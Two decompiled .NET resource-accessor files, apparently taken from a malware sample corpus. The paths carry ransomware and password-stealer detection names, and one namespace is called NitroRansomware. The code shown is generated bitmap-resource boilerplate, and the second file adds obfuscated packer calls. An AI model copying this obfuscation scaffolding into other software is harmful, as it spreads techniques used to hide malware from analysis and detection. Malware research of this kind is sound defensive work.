File: HEUR-Trojan-Ransom/MSIL/B/HEUR-Trojan-Ransom.MSIL.Blocker.gen-a5e68ee39e62fd5c32b530077b51f481443dbd9dc759ecff6138d10c78beed2a/Apjmqciddnbbpsnfq.Properties/Resources.cs
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;

namespace Apjmqciddnbbpsnfq.Properties;

[DebuggerNonUserCode]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
internal class Resources
{
	private static ResourceManager role;

	private static CultureInfo global;

	internal static Resources DefineSingleton;

	[EditorBrowsable(EditorBrowsableState.Advanced)]
	internal static ResourceManager ResourceManager
	{
		get
		{
			if (role == null)
			{
				role = new ResourceManager("Apjmqciddnbbpsnfq.Properties.Resources", typeof(Resources).Assembly);
			}
			return role;
		}
	}

	[EditorBrowsable(EditorBrowsableState.Advanced)]
	internal static CultureInfo Culture
	{
		get
		{
			return global;
		}
		set
		{
			global = value;
		}
	}

	internal static Bitmap _26_Kissy => (Bitmap)ResourceManager.GetObject("_26_Kissy", global);

	internal static Bitmap _27_Goatse => (Bitmap)ResourceManager.GetObject("_27_Goatse", global);

	internal static Bitmap _28_Nomnomnom => (Bitmap)ResourceManager.GetObject("_28_Nomnomnom", global);

	internal static Bitmap _29_Zzz => (Bitmap)ResourceManager.GetObject("_29_Zzz", global);

	internal static Bitmap _30_Total_shock => (Bitmap)ResourceManager.GetObject("_30_Total_shock", global);

	internal Resources()
	{
	}

	internal static bool ManageSingleton()
	{
		return DefineSingleton == null;
	}

	internal static Resources CloneSingleton()
	{
		return DefineSingleton;
	}
}

File: HEUR-Trojan-PSW/MSIL/D/HEUR-Trojan-PSW.MSIL.Disco.gen-7d7f39ea140c1d58a017ffdd969c8a6f6201bfb578b4090b1e4588be84a7e29a/NitroRansomware/Properties/Resources.vb
Imports System
Imports System.CodeDom.Compiler
Imports System.ComponentModel
Imports System.Diagnostics
Imports System.Drawing
Imports System.Globalization
Imports System.Resources
Imports System.Runtime.CompilerServices
Imports dg3ypDAonQcOidMs0w
Imports rE4lpnT863QnijKQK5
Imports zlqCXdcKao7YZQAGFe

Namespace NitroRansomware.Properties
	' Token: 0x0200000D RID: 13
	<CompilerGenerated()>
	<GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")>
	<DebuggerNonUserCode()>
	Friend Class Resources
		' Token: 0x06000047 RID: 71 RVA: 0x00002243 File Offset: 0x00000443
		Friend Sub New()
			hHEYokUTtehNq5ji0d.LQgF529zBT6Ox()
			MyBase..ctor()
		End Sub

		' Token: 0x17000001 RID: 1
		' (get) Token: 0x06000048 RID: 72 RVA: 0x000050FC File Offset: 0x000032FC
		<EditorBrowsable(EditorBrowsableState.Advanced)>
		Friend Shared ReadOnly Property ResourceManager As ResourceManager
			Get
				If Resources.resourceMan Is Nothing Then
					Dim resourceManager As ResourceManager = New ResourceManager("NitroRansomware.Properties.Resources", Type.GetTypeFromHandle(kSQlZa9TWrZWUAWTnp.GLmF52oPYUmB1(33554445)).Assembly)
					Resources.resourceMan = resourceManager
				End If
				Return Resources.resourceMan
			End Get
		End Property

		' Token: 0x17000002 RID: 2
		' (get) Token: 0x06000049 RID: 73 RVA: 0x00005140 File Offset: 0x00003340
		' (set) Token: 0x0600004A RID: 74 RVA: 0x00002419 File Offset: 0x00000619
		<EditorBrowsable(EditorBrowsableState.Advanced)>
		Friend Shared Property Culture As CultureInfo
			Get
				Return Resources.resourceCulture
			End Get
			Set(value As CultureInfo)
				Resources.resourceCulture = value
			End Set
		End Property

		' Token: 0x17000003 RID: 3
		' (get) Token: 0x0600004B RID: 75 RVA: 0x00005154 File Offset: 0x00003354
		Friend Shared ReadOnly Property wl As Bitmap
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject(WP6RZJql8gZrNhVA9v.L3hoFlcqP6(5600), Resources.resourceCulture)
				Return CType([object], Bitmap)
			End Get
		End Property

		' Token: 0x0600004C RID: 76 RVA: 0x0000223C File Offset: 0x0000043C
		' Note: this type is marked as 'beforefieldinit'.
		Shared Sub New()
			WP6RZJql8gZrNhVA9v.iXLoKRSpAw()
		End Sub

		' Token: 0x0400003F RID: 63
		Private Shared resourceMan As ResourceManager

		' Token: 0x04000040 RID: 64
		Private Shared resourceCulture As CultureInfo
	End Class
End Namespace
